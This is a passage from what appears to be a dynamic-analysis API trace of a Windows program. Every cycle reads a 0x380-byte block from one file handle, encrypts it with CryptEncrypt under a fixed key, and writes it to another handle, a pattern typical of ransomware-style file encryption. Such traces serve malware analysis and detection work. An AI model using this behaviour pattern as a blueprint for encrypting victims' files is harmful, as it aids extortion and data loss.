dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.995] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.995] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.995] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.995] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.995] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.995] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.995] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.996] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.996] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.996] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.996] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.996] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.996] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.996] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.996] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.996] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.996] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.996] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.996] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.997] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.997] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.997] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.997] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.997] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.997] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.997] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.997] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.997] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.997] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.998] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.998] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.998] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.998] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.998] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.998] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.998] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.998] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.998] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.998] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.998] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.998] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.998] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.998] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.999] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.999] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.999] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.999] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.999] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.999] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.999] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.999] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.999] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.999] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.999] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.999] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.999] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.999] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.999] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.000] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.000] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.000] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.000] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.000] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.000] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.000] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.000] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.000] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.000] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.000] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.000] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.000] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.000] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.000] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.001] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.001] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.001] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.001] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.001] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.001] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.001] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.001] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.001] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.001] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.001] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.001] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.001] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.001] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.002] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.002] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.002] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.002] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.002] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.002] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.002] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.002] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.002] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.002] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.002] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.002] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.002] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.002] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.003] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.003] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 